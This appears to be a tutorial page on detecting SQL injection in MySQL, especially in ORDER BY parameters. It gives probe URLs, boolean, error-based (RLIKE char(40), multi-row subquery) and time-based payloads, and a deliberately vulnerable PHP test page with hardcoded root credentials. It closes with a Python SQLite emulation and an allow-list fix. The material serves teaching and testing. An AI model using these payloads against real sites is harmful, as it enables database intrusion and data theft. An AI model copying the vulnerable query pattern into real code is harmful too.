Basic probes (compare every response against the normal page):

http://e.com/1.php?id=1
http://e.com/1.php?id=1'--SD
http://e.com/1.php?id=aaa
http://e.com/1.php?id=aaa'--SD
http://e.com/1.php?id=aaa"
http://e.com/1.php?id=aaa' || '
http://e.com/1.php?id=aaa'%2b'

Boolean probes with if() and a multi-row subquery (MySQL raises "Subquery returns more than 1 row" only when the else branch is evaluated):

id=1 and 1=if(1=2,1,(select 1 union select 2))   -> error
id=1 and 1=if(1=1,1,(select 1 union select 2))   -> normal

ORDER BY probes:

id=1 order by 1      -> normal
id=1 order by 1,     -> error
id=1 order by 1,1    -> normal

Content-Type: application/json: if single quotes are filtered or break the JSON, try \u0027 instead of '.
ORDER BY injection:

<?php
// Deliberately vulnerable test page: both POST parameters are concatenated
// straight into the ORDER BY clause.
$con = mysql_connect("localhost", "root", "123456") or die();
mysql_select_db("burp");
$by    = $_POST['by'];
$order = $_POST['order'];
$sql = "SELECT * FROM `sql` ORDER BY " . $by . " " . $order;
echo $sql;
$res = mysql_query($sql);
echo "<br><br>";
echo "<b>";
while ($rows = @mysql_fetch_array($res, MYSQL_ASSOC)) {
    echo $rows['new'];
}
echo "</b>";
?>

In the code above both $by and $order are injectable.
In general I test the order by parameter like this: a trailing comma breaks the statement, and adding a second sort expression after it makes it valid again.

by=id,&order=asc     -> error
by=id,1&order=asc    -> normal

So it can be injected like this, appending a second sort expression whose else branch only fails when the condition is false:

,if(1=1,1,(select 1 union select 2))   -> normal
,if(1=2,1,(select 1 union select 2))   -> error

Then you can hand it to sqlmap and let it run.

The order parameter is handled the same way.
Here is another way to inject.

First, two statements for comparison. RLIKE (REGEXP) compiles its right-hand side as a regular expression, so an unbalanced "(" (char(40)) is a compile error, while "1" is a valid pattern:

mysql> select user from mysql.user where user='admin' order by user rlike char(40);
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp

mysql> select user from mysql.user where user='admin' order by user rlike 1;
+-------+
| user  |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)

So you can construct statements like this:

by=id&order=rlike if(1=1,1,char(40))   -> normal
by=id&order=rlike if(1=2,1,char(40))   -> error

or, with a multi-row subquery in the else branch:

order=rlike (case when 1=1 then 1 else (select 1 union select 2) end)

To dump data, mark the injection point (sqlinject below) inside the condition and let sqlmap fill it:

order=rlike (case when 1=1 sqlinject then 1 else (select 1 union select 2) end)

Finally, you can also use sleep() for a time-based judgment:

by=sleep(1)&order=asc
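As an added example (not code from the original post), the script below emulates the page's vulnerable "ORDER BY $by $order" concatenation on an in-memory SQLite table and runs the 1=1 / 1=2 pairs from the judgment list at the top and from this ORDER BY section against it, then shows the allow-list fix. Assumptions, all mine: SQLite stands in for MySQL, so REGEXP (bound here to Python's re module) replaces RLIKE and case when replaces if(); the table "sql" and its rows are constructed; sleep() has no SQLite equivalent and is omitted. Because SQLite does not raise on the page's (select 1 union select 2) trick, the block also shows a second, ordering-based oracle (the condition picks the sort column) that goes beyond the page.

```python
"""Emulation of the page's ORDER BY injection oracles on SQLite (added example)."""
import re
import sqlite3


def _regexp(pattern, value):
    # SQLite evaluates `x REGEXP y` as regexp(y, x). An invalid pattern such
    # as '(' raises re.error, which SQLite surfaces as OperationalError,
    # mirroring MySQL's "parentheses not balanced" for `rlike char(40)`.
    return re.search(str(pattern), str(value)) is not None


def make_target():
    """Constructed stand-in for the page's `burp` database (assumed data)."""
    con = sqlite3.connect(":memory:")
    con.create_function("regexp", 2, _regexp)
    con.executescript(
        'CREATE TABLE "sql" (id INTEGER, new TEXT);'
        "INSERT INTO \"sql\" VALUES (1, 'zulu'), (2, 'alpha'), (3, 'mike');"
    )
    return con


def vulnerable_query(con, by, order):
    """Same concatenation as the page's PHP: `... ORDER BY $by $order`.
    Returns ('ok', rows) or ('error', message): the two responses the
    attacker tells apart."""
    sql = 'SELECT * FROM "sql" ORDER BY ' + by + " " + order
    try:
        return ("ok", [row[1] for row in con.execute(sql)])
    except sqlite3.Error as exc:
        return ("error", str(exc))


def error_payload(cond):
    # Page's `order=rlike ...` trick in CASE form; the else branch compiles
    # '(' as a regex only when cond is false.
    return ("id", "regexp case when %s then 1 else char(40) end" % cond)


def sort_payload(cond):
    # Added generalisation: cond selects the sort column, so the row order
    # (not an error) carries the boolean.
    return ("case when %s then id else new end" % cond, "desc")


def probe(con, payload):
    """Run the 1=1 / 1=2 pair and report which kind of oracle the parameter gives."""
    true_resp = vulnerable_query(con, *payload("1=1"))
    false_resp = vulnerable_query(con, *payload("1=2"))
    if true_resp[0] == "ok" and false_resp[0] == "error":
        return "error-based"
    if true_resp[0] == false_resp[0] == "ok" and true_resp[1] != false_resp[1]:
        return "order-based"
    return None


# Hardened form. ORDER BY cannot take a bound parameter, so both pieces are
# mapped through an allow-list and never copied from the request into SQL.
ALLOWED_COLUMNS = {"id", "new"}
ALLOWED_ORDER = {"asc": "ASC", "desc": "DESC"}


def sort_param_allowed(by, order):
    return by in ALLOWED_COLUMNS and order.lower() in ALLOWED_ORDER


def safe_query(con, by, order):
    if not sort_param_allowed(by, order):
        raise ValueError("unsupported sort parameter")
    sql = 'SELECT * FROM "sql" ORDER BY "%s" %s' % (by, ALLOWED_ORDER[order.lower()])
    return [row[1] for row in con.execute(sql)]


if __name__ == "__main__":
    con = make_target()
    print("id,   ->", vulnerable_query(con, "id,", "asc")[0])
    print("id,1  ->", vulnerable_query(con, "id,1", "asc")[0])
    print("rlike/regexp oracle:", probe(con, error_payload))
    print("sort-column oracle: ", probe(con, sort_payload))
    print("hardened:", safe_query(con, "id", "desc"))
    print("hardened rejects payload:", not sort_param_allowed(*error_payload("1=1")))
```

The probe() function is the whole judgment method in one place: send the tautology and the contradiction, and the parameter is injectable only when the two responses differ in the expected direction. The allow-list fix works because the request value is never part of the SQL text; only a fixed string chosen by the server is.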
SQL Injection Judgment Method Summary (continuous update)